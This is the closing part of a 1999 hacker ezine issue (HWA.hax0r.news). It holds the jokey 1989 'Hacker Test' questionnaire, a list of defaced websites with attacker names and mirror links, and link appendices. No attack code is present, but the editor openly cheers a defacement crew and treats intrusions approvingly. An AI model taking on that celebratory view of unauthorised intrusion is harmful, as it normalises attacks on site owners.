~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... Since you're here check out the (now dated) Hacker Purity test at the url following...: http://www.armory.com/tests/hacker.html for an online test with instant results (it will reckon up your score online after you complete the test which is just wizard..guffah - Ed) THE HACKER TEST - Version 1.0 From NutWorks, the former Bitnet humour group Submitted-by: claudio@amsoft.imp.com (Claudio Nieder, Uster, Switzerland) Preface: 06.16.89 This test was conceived and written by Felix Lee, John Hayes and Angela Thomas at the end of the spring semester, 1989. It has gone through many revisions prior to this initial release, and will undoubtedly go through many more. (Slight revisions by William Ward on 12.08.89) Herewith a compendium of fact and folklore about computer hackerdom, cunningly disguised as a test. Check all boxes for which your answer is "yes". The "submit" button is at the bottom. 1.And now for the questions... 1. 0x000 Have you ever owned a computer? 2. 0x001 Have you ever used a computer? 3. 0x002 ... for more than 4 hours continuously? 4. 0x003 ... more than 8 hours? 5. 0x004 ... more than 16 hours? 6. 0x005 ... more than 32 hours? 7. 0x006 Have you ever patched paper tape? 8. 0x007 Have you ever missed a class while programming? 9. 0x008 ... Missed an examination? 10. 0x009 ... Missed a wedding? 11. 0x00A ... Missed your own wedding? 12. 0x00B Have you ever programmed while intoxicated? 13. 0x00C ... Did it make sense the next day? 14. 0x00D Have you ever written a flight simulator? 15. 0x00E Have you ever voided the warranty on your equipment? 16. 0x00F Ever change the value of 4? 17. 0x010 ... Unintentionally? 18. 0x011 ... In a language other than Fortran? 19. 0x012 Do you use DWIM to make life interesting? 20. 0x013 Have you named a computer? 21. 0x014 Do you complain when a "feature" you use gets fixed? 22. 0x015 Do you eat slime-molds? 23. 0x016 Do you know how many days old you are? 24. 0x017 Have you ever wanted to download pizza? 25. 0x018 Have you ever invented a computer joke? 26. 0x019 ... Did someone not 'get' it? 27. 0x01A Can you recite Jabberwocky? 28. 0x01B ... Backwards? 29. 0x01C Have you seen "Donald Duck in Mathemagic Land"? 30. 0x01D Have you seen "Tron"? 31. 0x01E Have you seen "Wargames"? 32. 0x01F Do you know what ASCII stands for? 33. 0x020 ... EBCDIC? 34. 0x021 Can you read and write ASCII in hex or octal? 35. 0x022 Do you know the names of all the ASCII control codes? 36. 0x023 Can you read and write EBCDIC in hex? 37. 0x024 Can you convert from EBCDIC to ASCII and vice versa? 38. 0x025 Do you know what characters are the same in both ASCII and EBCDIC? 39. 0x026 Do you know maxint on your system? 40. 0x027 Ever define your own numerical type to get better precision? 41. 0x028 Can you name powers of two up to 2**16 in arbitrary order? 42. 0x029 ... up to 2**32? 43. 0x02A ... up to 2**64? 44. 0x02B Can you read a punched card, looking at the holes? 45. 0x02C ... feeling the holes? 46. 0x02D Have you ever patched binary code? 47. 0x02E ... While the program was running? 48. 0x02F Have you ever used program overlays? 49. 0x030 Have you met any IBM vice-president? 50. 0x031 Do you know Dennis, Bill, or Ken? 51. 0x032 Have you ever taken a picture of a CRT? 52. 0x033 Have you ever played a videotape on your CRT? 53. 0x034 Have you ever digitized a picture? 54. 0x035 Did you ever forget to mount a scratch monkey? 55. 0x036 Have you ever optimized an idle loop? 56. 0x037 Did you ever optimize a bubble sort? 57. 0x038 Does your terminal/computer talk to you? 58. 0x039 Have you ever talked into an acoustic modem? 59. 0x03A ... Did it answer? 60. 0x03B Can you whistle 300 baud? 61. 0x03C ... 1200 baud? 62. 0x03D Can you whistle a telephone number? 63. 0x03E Have you witnessed a disk crash? 64. 0x03F Have you made a disk drive "walk"? 65. 0x040 Can you build a puffer train? 66. 0x041 ... Do you know what it is? 67. 0x042 Can you play music on your line printer? 68. 0x043 ... Your disk drive? 69. 0x044 ... Your tape drive? 70. 0x045 Do you have a Snoopy calendar? 71. 0x046 ... Is it out-of-date? 2.Do you have a line printer picture of... 1. 0x047 ... the Mona Lisa? 2. 0x048 ... the Enterprise? 3. 0x049 ... Einstein? 4. 0x04A ... Oliver? 5. 0x04B Have you ever made a line printer picture? 3.Do you know what the following stand for? 1. 0x04C ... DASD 2. 0x04D ... Emacs 3. 0x04E ... ITS 4. 0x04F ... RSTS/E 5. 0x050 ... SNA 6. 0x051 ... Spool 7. 0x052 ... TCP/IP 4.Have you ever used: 1. 0x053 ... TPU? 2. 0x054 ... TECO? 3. 0x055 ... Emacs? 4. 0x056 ... ed? 5. 0x057 ... vi? 6. 0x058 ... Xedit (in VM/CMS)? 7. 0x059 ... SOS? 8. 0x05A ... EDT? 9. 0x05B ... Wordstar? 10. 0x05C Have you ever written a CLIST? 11. 0x05D Have you ever programmed in the X windowing system? 12. 0x05E ... CICS? 13. 0x05F Have you ever received a Fax or a photocopy of a floppy? 14. 0x060 Have you ever shown a novice the "any" key? 15. 0x061 ... Was it the power switch? 16. 0x062 Have you ever attended Usenix? 17. 0x063 ... DECUS? 18. 0x064 ... SHARE? 19. 0x065 ... SIGGRAPH? 20. 0x066 ... NetCon? 21. 0x067 Have you ever participated in a standards group? 22. 0x068 Have you ever debugged machine code over the telephone? 23. 0x069 Have you ever seen voice mail? 24. 0x06A ... Can you read it? 25. 0x06B Do you solve word puzzles with an on-line dictionary? 26. 0x06C Have you ever taken a Turing test? 27. 0x06D ... Did you fail? 28. 0x06E Ever drop a card deck? 29. 0x06F ... Did you successfully put it back together? 30. 0x070 ... Without looking? 31. 0x071 Have you ever used IPCS? 32. 0x072 Have you ever received a case of beer with your computer? 33. 0x073 Does your computer come in 'designer' colors? 34. 0x074 Ever interrupted a UPS? 35. 0x075 Ever mask an NMI? 36. 0x076 Have you ever set off a Halon system? 37. 0x077 ... Intentionally? 38. 0x078 ... Do you still work there? 39. 0x079 Have you ever hit the emergency power switch? 40. 0x07A ... Intentionally? 41. 0x07B Do you have any defunct documentation? 42. 0x07C ... Do you still read it? 43. 0x07D Ever reverse-engineer or decompile a program? 44. 0x07E ... Did you find bugs in it? 45. 0x07F Ever help the person behind the counter with their terminal/computer? 46. 0x080 Ever tried rack mounting your telephone? 47. 0x081 Ever thrown a computer from more than two stories high? 48. 0x082 Ever patched a bug the vendor does not acknowledge? 49. 0x083 Ever fix a hardware problem in software? 50. 0x084 ... Vice versa? 51. 0x085 Ever belong to a user/support group? 52. 0x086 Ever been mentioned in Computer Recreations? 53. 0x087 Ever had your activities mentioned in the newspaper? 54. 0x088 ... Did you get away with it? 55. 0x089 Ever engage a drum brake while the drum was spinning? 56. 0x08A Ever write comments in a non-native language? 57. 0x08B Ever physically destroy equipment from software? 58. 0x08C Ever tried to improve your score on the Hacker Test? 59. 0x08D Do you take listings with you to lunch? 60. 0x08E ... To bed? 61. 0x08F Ever patch a microcode bug? 62. 0x090 ... around a microcode bug? 63. 0x091 Can you program a Turing machine? 64. 0x092 Can you convert postfix to prefix in your head? 65. 0x093 Can you convert hex to octal in your head? 66. 0x094 Do you know how to use a Kleene star? 67. 0x095 Have you ever starved while dining with philosophers? 68. 0x096 Have you solved the halting problem? 69. 0x097 ... Correctly? 70. 0x098 Ever deadlock trying eating spaghetti? 71. 0x099 Ever written a self-reproducing program? 72. 0x09A Ever swapped out the swapper? 73. 0x09B Can you read a state diagram? 74. 0x09C ... Do you need one? 75. 0x09D Ever create an unkillable program? 76. 0x09E ... Intentionally? 77. 0x09F Ever been asked for a cookie? 78. 0x0A0 Ever speed up a system by removing a jumper? 5.Do you know... 1. 0x0A1 Do you know who wrote Rogue? 2. 0x0A2 ... Rogomatic? 3. 0x0A3 Do you know Gray code? 4. 0x0A4 Do you know what HCF means? 5. 0x0A5 ... Ever use it? 6. 0x0A6 ... Intentionally? 7. 0x0A7 Do you know what a lace card is? 8. 0x0A8 ... Ever make one? 9. 0x0A9 Do you know the end of the epoch? 10. 0x0AA ... Have you celebrated the end of an epoch? 11. 0x0AB ... Did you have to rewrite code? 12. 0x0AC Do you know the difference between DTE and DCE? 13. 0x0AD Do you know the RS-232C pinout? 14. 0x0AE ... Can you wire a connector without looking? 6.Do you have... 1. 0x0AF Do you have a copy of Dec Wars? 2. 0x0B0 Do you have the Canonical Collection of Lightbulb Jokes? 3. 0x0B1 Do you have a copy of the Hacker's dictionary? 4. 0x0B2 ... Did you contribute to it? 5. 0x0B3 Do you have a flowchart template? 6. 0x0B4 ... Is it unused? 7. 0x0B5 Do you have your own fortune-cookie file? 8. 0x0B6 Do you have the Anarchist's Cookbook? 9. 0x0B7 ... Ever make anything from it? 10. 0x0B8 Do you own a modem? 11. 0x0B9 ... a terminal? 12. 0x0BA ... a toy computer? 13. 0x0BB ... a personal computer? 14. 0x0BC ... a minicomputer? 15. 0x0BD ... a mainframe? 16. 0x0BE ... a supercomputer? 17. 0x0BF ... a hypercube? 18. 0x0C0 ... a printer? 19. 0x0C1 ... a laser printer? 20. 0x0C2 ... a tape drive? 21. 0x0C3 ... an outmoded peripheral device? 22. 0x0C4 Do you have a programmable calculator? 23. 0x0C5 ... Is it RPN? 24. 0x0C6 Have you ever owned more than 1 computer? 25. 0x0C7 ... 4 computers? 26. 0x0C8 ... 16 computers? 27. 0x0C9 Do you have a SLIP line? 28. 0x0CA ... a T1 line? 29. 0x0CB Do you have a separate phone line for your terminal/computer? 30. 0x0CC ... Is it illegal? 31. 0x0CD Do you have core memory? 32. 0x0CE ... drum storage? 33. 0x0CF ... bubble memory? 34. 0x0D0 Do you use more than 16 megabytes of disk space? 35. 0x0D1 ... 256 megabytes? 36. 0x0D2 ... 1 gigabyte? 37. 0x0D3 ... 16 gigabytes? 38. 0x0D4 ... 256 gigabytes? 39. 0x0D5 ... 1 terabyte? 40. 0x0D6 Do you have an optical disk/disk drive? 41. 0x0D7 Do you have a personal magnetic tape library? 42. 0x0D8 ... Is it unlabelled? 43. 0x0D9 Do you own more than 16 floppy disks? 44. 0x0DA ... 64 floppy disks? 45. 0x0DB ... 256 floppy disks? 46. 0x0DC ... 1624 floppy disks? 47. 0x0DD Do you have any 8-inch disks? 48. 0x0DE Do you have an internal stack? 49. 0x0DF Do you have a clock interrupt? 50. 0x0E0 Do you own volumes 1 to 3 of _The Art of Computer Programming_? 51. 0x0E1 ... Have you done all the exercises? 52. 0x0E2 ... Do you have a MIX simulator? 53. 0x0E3 ... Can you name the unwritten volumes? 54. 0x0E4 Can you quote from _The Mythical Man-month_? 55. 0x0E5 ... Did you participate in the OS/360 project? 56. 0x0E6 Do you have a TTL handbook? 57. 0x0E7 Do you have printouts more than three years old? 7.Career questions 1. 0x0E8 Do you have a job? 2. 0x0E9 ... Have you ever had a job? 3. 0x0EA ... Was it computer-related? 4. 0x0EB Do you work irregular hours? 5. 0x0EC Have you ever been a system administrator? 6. 0x0ED Do you have more megabytes than megabucks? 7. 0x0EE Have you ever downgraded your job to upgrade your processing power? 8. 0x0EF Is your job secure? 9. 0x0F0 ... Do you have code to prove it? 10. 0x0F1 Have you ever had a security clearance? 8.Games 1. 0x0F2 Have you ever played Pong? 2. 0x0F3 ... Spacewar? 3. 0x0F4 ... Star Trek? 4. 0x0F5 ... Wumpus? 5. 0x0F6 ... Lunar Lander? 6. 0x0F7 ... Empire? 7. 0x0F8 Have you ever beaten Moria 4.8? 8. 0x0F9 ... Rogue 3.6? 9. 0x0FA ... Rogue 5.3? 10. 0x0FB ... Larn? 11. 0x0FC ... Hack 1.0.3? 12. 0x0FD ... Nethack 2.4? 13. 0x0FE Can you get a better score on Rogue than Rogomatic? 14. 0x0FF Have you ever solved Adventure? 15. 0x100 ... Zork? 16. 0x101 Have you ever written any redcode? 17. 0x102 Have you ever written an adventure program? 18. 0x103 ... a real-time game? 19. 0x104 ... a multi-player game? 20. 0x105 ... a networked game? 21. 0x106 Can you out-doctor Eliza? 9.Hardware 1. 0x107 Have you ever used a light pen? 2. 0x108 ... did you build it? 3. 0x109 Have you ever used a teletype? 4. 0x10A ... a paper tape? 5. 0x10B ... a decwriter? 6. 0x10C ... a card reader/punch? 7. 0x10D ... a SOL? 8. 0x10E Have you ever built an Altair? 9. 0x10F ... a Heath/Zenith computer? 10. 0x110 Do you know how to use an oscilliscope? 11. 0x111 ... a voltmeter? 12. 0x112 ... a frequency counter? 13. 0x113 ... a logic probe? 14. 0x114 ... a wirewrap tool? 15. 0x115 ... a soldering iron? 16. 0x116 ... a logic analyzer? 17. 0x117 Have you ever designed an LSI chip? 18. 0x118 ... has it been fabricated? 19. 0x119 Have you ever etched a printed circuit board? 10.Historical 1. 0x11A Have you ever toggled in boot code on the front panel? 2. 0x11B Can you program an Eniac? 3. 0x11C Ever seen a 90 column card? 11.IBM 1. 0x11D Do you recite IBM part numbers in your sleep? 2. 0x11E Do you know what IBM part number 7320154 is? 3. 0x11F Do you understand 3270 data streams? 4. 0x120 Do you know what the VM privilege classes are? 5. 0x121 Have you IPLed an IBM off the tape drive? 6. 0x122 ... off a card reader? 7. 0x123 Can you sing something from the IBM Songbook? 12.Languages 1. 0x124 Do you know more than 4 programming languages? 2. 0x125 ... 8 languages? 3. 0x126 ... 16 languages? 4. 0x127 ... 32 languages? 5. 0x128 Have you ever designed a programming language? 6. 0x129 Do you know what Basic stands for? 7. 0x12A ... Pascal? 8. 0x12B Can you program in Basic? 9. 0x12C ... Do you admit it? 10. 0x12D Can you program in Cobol? 11. 0x12E ... Do you deny it? 12. 0x12F Do you know Pascal? 13. 0x130 ... Modula-2? 14. 0x131 ... Oberon? 15. 0x132 ... More that two Wirth languages? 16. 0x133 ... Can you recite a Nicklaus Wirth joke? 17. 0x134 Do you know Algol-60? 18. 0x135 ... Algol-W? 19. 0x136 ... Algol-68? 20. 0x137 ... Do you understand the Algol-68 report? 21. 0x138 ... Do you like two-level grammars? 22. 0x139 Can you program in assembler on 2 different machines? 23. 0x13A ... on 4 different machines? 24. 0x13B ... on 8 different machines? 25. 0x13C Do you know APL? 26. 0x13D ... Ada? 27. 0x13E ... BCPL? 28. 0x13F ... C++? 29. 0x140 ... C? 30. 0x141 ... Comal? 31. 0x142 ... Eiffel? 32. 0x143 ... Forth? 33. 0x144 ... Fortran? 34. 0x145 ... Hypertalk? 35. 0x146 ... Icon? 36. 0x147 ... Lisp? 37. 0x148 ... Logo? 38. 0x149 ... MIIS? 39. 0x14A ... MUMPS? 40. 0x14B ... PL/I? 41. 0x14C ... Pilot? 42. 0x14D ... Plato? 43. 0x14E ... Prolog? 44. 0x14F ... RPG? 45. 0x150 ... Rexx (or ARexx)? 46. 0x151 ... SETL? 47. 0x152 ... Smalltalk? 48. 0x153 ... Snobol? 49. 0x154 ... VHDL? 50. 0x155 ... any assembly language? 51. 0x156 Can you talk VT-160? 52. 0x157 ... Postscript? 53. 0x158 ... SMTP? 54. 0x159 ... UUCP? 55. 0x15A ... English? 13.Micros 1. 0x15B Ever copy a copy-protected disk? 2. 0x15C Ever create a copy-protection scheme? 3. 0x15D Have you ever made a "flippy" disk? 4. 0x15E Have you ever recovered data from a damaged disk? 5. 0x15F Ever boot a naked floppy? 14.Networking 1. 0x160 Have you ever been logged in to two different timezones at once? 2. 0x161 Have you memorized the UUCP map for your country? 3. 0x162 ... For any country? 4. 0x163 Have you ever found a sendmail bug? 5. 0x164 ... Was it a security hole? 6. 0x165 Have you memorized the HOSTS.TXT table? 7. 0x166 ... Are you up to date? 8. 0x167 Can you name all the top-level nameservers and their addresses? 9. 0x168 Do you know RFC-822 by heart? 10. 0x169 ... Can you recite all the errors in it? 11. 0x16A Have you written a Sendmail configuration file? 12. 0x16B ... Does it work? 13. 0x16C ... Do you mumble "defocus" in your sleep? 14. 0x16D Do you know the max packet lifetime? 15.Operating systems 1. 0x16E Can you use BSD Unix? 2. 0x16F ... non-BSD Unix? 3. 0x170 ... AIX 4. 0x171 ... VM/CMS? 5. 0x172 ... VMS? 6. 0x173 ... MVS? 7. 0x174 ... VSE? 8. 0x175 ... RSTS/E? 9. 0x176 ... CP/M? 10. 0x177 ... COS? 11. 0x178 ... NOS? 12. 0x179 ... CP-67? 13. 0x17A ... RT-11? 14. 0x17B ... MS-DOS? 15. 0x17C ... Finder? 16. 0x17D ... PRODOS? 17. 0x17E ... more than one OS for the TRS-80? 18. 0x17F ... Tops-10? 19. 0x180 ... Tops-20? 20. 0x181 ... OS-9? 21. 0x182 ... OS/2? 22. 0x183 ... AOS/VS? 23. 0x184 ... Multics? 24. 0x185 ... ITS? 25. 0x186 ... Vulcan? 26. 0x187 Have you ever paged or swapped off a tape drive? 27. 0x188 ... Off a card reader/punch? 28. 0x189 ... Off a teletype? 29. 0x18A ... Off a networked (non-local) disk? 30. 0x18B Have you ever found an operating system bug? 31. 0x18C ... Did you exploit it? 32. 0x18D ... Did you report it? 33. 0x18E ... Was your report ignored? 34. 0x18F Have you ever crashed a machine? 35. 0x190 ... Intentionally? 16.People 1. 0x191 Do you know fewer than three people? 2. 0x192 ... fewer than two? 3. 0x193 ... nobody at all? 17.Personal 1. 0x194 Are your shoelaces untied? 2. 0x195 Do you interface poorly with strangers? 3. 0x196 Are you able to recite phone numbers for half-a-dozen computer systems but unable to recite your own? 4. 0x197 Do you log in before breakfast? 5. 0x198 Do you consume more than LD-50 caffeine a day? 6. 0x199 Do you answer either-or questions with "yes"? 7. 0x19A Do you own an up-to-date copy of any operating system manual? 8. 0x19B ... *every* operating system manual? 9. 0x19C Do other people have difficulty using your customized environment? 10. 0x19D Do you dream in any programming languages? 11. 0x19E Do you have difficulty focusing on three-dimensional objects? 12. 0x19F Do you ignore mice? 13. 0x1A0 Do you despise the CAPS LOCK key? 14. 0x1A1 Do you believe menus belong in restaurants? 15. 0x1A2 Do you have a Mandelbrot hanging on your wall? 16. 0x1A3 Have you ever decorated with magnetic tape or punched cards? 17. 0x1A4 Do you have a disk platter or a naked floppy hanging in your home? 18. 0x1A5 Have you ever seen the dawn? 19. 0x1A6 ... Twice in a row? 20. 0x1A7 Do you use "foobar" in daily conversation? 21. 0x1A8 ... "bletch"? 22. 0x1A9 Do you use the "P convention"? 23. 0x1AA Do you automatically respond to any user question with RTFM? 24. 0x1AB ... Do you know what it means? 25. 0x1AC Do you think garbage collection means memory management? 26. 0x1AD Do you have problems allocating horizontal space in your room/office? 27. 0x1AE Do you read Scientific American in bars to pick up women? 28. 0x1AF Is your license plate computer-related? 29. 0x1B0 Have you ever taken the Purity test? 30. 0x1B1 Ever have an out-of-CPU experience? 31. 0x1B2 Have you ever set up a blind date over the computer? 32. 0x1B3 Do you talk to the person next to you via computer? 18.Programming 1. 0x1B4 Can you write a Fortran compiler? 2. 0x1B5 ... In TECO? 3. 0x1B6 Can you read a machine dump? 4. 0x1B7 Can you disassemble code in your head? 5. 0x1B8 Have you ever written a compiler? 6. 0x1B9 ... an operating system? 7. 0x1BA ... a device driver? 8. 0x1BB ... a text processor? 9. 0x1BC ... a display hack? 10. 0x1BD ... a database system? 11. 0x1BE ... an expert system? 12. 0x1BF ... an edge detector? 13. 0x1C0 ... a real-time control system? 14. 0x1C1 ... an accounting package? 15. 0x1C2 ... a virus? 16. 0x1C3 ... a prophylactic? 17. 0x1C4 Have you ever written a biorhythm program? 18. 0x1C5 ... Did you sell the output? 19. 0x1C6 ... Was the output arbitrarily invented? 20. 0x1C7 Have you ever computed pi to more than a thousand decimal places? 21. 0x1C8 ... the number e? 22. 0x1C9 Ever find a prime number of more than a hundred digits? 23. 0x1CA Have you ever written self-modifying code? 24. 0x1CB ... Are you proud of it? 25. 0x1CC Did you ever write a program that ran correctly the first time? 26. 0x1CD ... Was it longer than 20 lines? 27. 0x1CE ... 100 lines? 28. 0x1CF ... Was it in assembly language? 29. 0x1D0 ... Did it work the second time? 30. 0x1D1 Can you solve the Towers of Hanoi recursively? 31. 0x1D2 ... Non-recursively? 32. 0x1D3 ... Using the Troff text formatter? 33. 0x1D4 Ever submit an entry to the Obfuscated C code contest? 34. 0x1D5 ... Did it win? 35. 0x1D6 ... Did your entry inspire a new rule? 36. 0x1D7 Do you know Duff's device? 37. 0x1D8 Do you know Jensen's device? 38. 0x1D9 Ever spend ten minutes trying to find a single-character error? 39. 0x1DA ... More than an hour? 40. 0x1DB ... More than a day? 41. 0x1DC ... More than a week? 42. 0x1DD ... Did the first person you show it to find it immediately? 19.Unix 1. 0x1DE Can you use Berkeley Unix? 2. 0x1DF .. Non-Berkeley Unix? 3. 0x1E0 Can you distinguish between sections 4 and 5 of the Unix manual? 4. 0x1E1 Can you find TERMIO in the System V release 2 documentation? 5. 0x1E2 Have you ever mounted a tape as a Unix file system? 6. 0x1E3 Have you ever built Minix? 7. 0x1E4 Can you answer "quiz function ed-command" correctly? 8. 0x1E5 ... How about "quiz ed-command function"? 20.Usenet 1. 0x1E6 Do you read news? 2. 0x1E7 ... More than 32 newsgroups? 3. 0x1E8 ... More than 256 newsgroups? 4. 0x1E9 ... All the newsgroups? 5. 0x1EA Have you ever posted an article? 6. 0x1EB ... Do you post regularly? 7. 0x1EC Have you ever posted a flame? 8. 0x1ED ... Ever flame a cross-posting? 9. 0x1EE ... Ever flame a flame? 10. 0x1EF ... Do you flame regularly? 11. 0x1F0 Ever have your program posted to a source newsgroup? 12. 0x1F1 Ever forge a posting? 13. 0x1F2 Ever form a new newsgroup? 14. 0x1F3 ... Does it still exist? 15. 0x1F4 Ever delete a pre-existing newsgroup? Do you remember 16. 0x1F5 ... mod.ber? 17. 0x1F6 ... the Stupid People's Court? 18. 0x1F7 ... Bandy-grams? 21.Phreaking 1. 0x1F8 Have you ever built a black box? 2. 0x1F9 Can you name all of the 'colors' of boxes? 3. 0x1FA ... and their associated functions? 4. 0x1FB Does your touch tone phone have 16 DTMF buttons on it? 5. 0x1FC Did the breakup of MaBell create more opportunities for you? 6. 0x1FD Do you know 4 or more calling card numbers (not your own)? Scoring To determine your hacker purity, use the submit button at the bottom, or subtract the number of questions you answered yes to from 0x200. This gives you your hacker purity level (a measure of how un-corrupt you are in the hacker domain). Find your purity in this table: 0x000 and 0x016 -> Wizard 0x017 and 0x040 -> Guru 0x041 and 0x080 -> Hacker 0x081 and 0x0C0 -> Nerd 0x0C1 and 0x100 -> Operator 0x101 and 0x180 -> User 0x181 and 0x200 -> Computer Illiterate If you don't understand the scoring part of the test, you should have just stopped at the beginning. If you have any comments of suggestions regarding the HACKER TEST, please send then to one of these addresses: hayes@psunuce.bitnet jwh100@psuvm.bitnet jwh100@psuvmxa.bitnet jwh100@psuvm.psu.edu jwh100@psuvmxa.psu.edu Note: Any errors introduced by the conversion of this test to HTML are the fault of John DuBois, not the author mentioned above. @HWA SITE.1 You can Send in submissions for this section too if you've found a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... contributed by InET - Media via HNN Crackdown in Latin America? We have heard a rumor about a possible conspiracy against Latin American technology enthusiasts by several intelligence organizations from various countries. Specifically the rumor mentions the capture of 50 "hackers" in Colombia and others in Latin America. If somebody has more information, please let us know. contact@hackernews.com cc:hwa@press.usmc.net Latest cracked pages courtesy of attrition.org Defaced: http://www.legions.org (Legions of the Underground) By: 430 Mirror: http://www.attrition.org/mirror/attrition/1999/09/04/www.legions.org OS: Linux Defaced: http://www.linuxhq.org (Linux Headquarters) By: Level Seven Mirror: http://www.attrition.org/mirror/attrition/1999/09/05/www.linuxhq.org/ OS: Linux Defaced: http://www.c-span.org (C-Span) By: United Loan Gunmen Mirror: http://www.attrition.org/mirror/attrition/1999/09/05/www.c-span.org OS: NT This is the Web site of the Cable channel C-Span. The ULG also defaced the ABC Network last month. Defaced: http://www.cityofcairns.qld.gov.au By: Unknown Mirror: http://www.attrition.org/mirror/attrition/1999/09/06/www.cityofcairns.qld.gov.au/ OS: NT Defaced: http://www.sheraton.com (Sheraton Hotels) By: Level Seven Crew Mirror: http://www.attrition.org/mirror/attrition/1999/09/06/www.sheraton.com/ OS: Solaris Defaced: http://www.usembassy-china.gov (US Embassy in China) By: Level Seven Crew Mirror: http://www.attrition.org/mirror/attrition/1999/09/07/www.usembassy-china.gov OS: Solaris South Coast Area Network (www.coos.or.us) Cell Talk Accessories (www.celltalkaccessories.com) Statistics South Africa (www.statssa.gov.za) US Embassy in China (Chinese Server) (www.usembassy-china.org.cn) MTV Asia (mtvasia.com) Club Search (www.clubsearch.co.uk) Malaysian Science and Technology Information Centre (www.mastic.gov.my) Architectural Concepts Online (www.arconcepts.com) Strategic Information Solutions, Inc. (www.sis.net) 1499 (www.1499.com) Adult Free Pics (www.adultfreepics.com) Home Organization for Money Management (www.homm.org) NetCom GmbH (www.netcom.ch) Graduate School of Public Policy Studies, U. of Chicago (www.harrisschool.uchicago.edu) InfoHype (infohype.11net.com) Desert Winds High School (www.dwhs.org) Harley-Davidson Parts and Clubs (www.hogs.com) 123 Inc. (www.123inc.com) The Open University (www.open.ac.uk) Iptek Indonesia (webprimus.iptek.net.id) Oz Online (www.ozonline.com.au) InterDiscount Switzerland (www.interdiscount.ch) NASA JPL Quality Assurance Engineering (qa-web.jpl.nasa.gov) Government of Brazil (www.brasil.gov.br) South Coast Area Network (www.coos.or.us) Cell Talk Accessories (www.celltalkaccessories.com) Statistics South Africa (www.statssa.gov.za) US Embassy in China (Chinese Server) (www.usembassy-china.org.cn) Sex Creations (www.sexcreations.com) Harley-Davidson Parts and Clubs (www.hogs.com) 123 Inc. (www.123inc.com) The Open University (www.open.ac.uk) Iptek Indonesia (webprimus.iptek.net.id) Oz Online (www.ozonline.com.au) InterDiscount Switzerland (www.interdiscount.ch) NASA JPL Quality Assurance Engineering (qa-web.jpl.nasa.gov) Government of Brazil (www.brasil.gov.br) South Coast Area Network (www.coos.or.us) Cell Talk Accessories (www.celltalkaccessories.com) Statistics South Africa (www.statssa.gov.za) US Embassy in China (Chinese Server) (www.usembassy-china.org.cn) MTV Asia (mtvasia.com) Club Search (www.clubsearch.co.uk) Malaysian Science and Technology Information Centre (www.mastic.gov.my) and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com 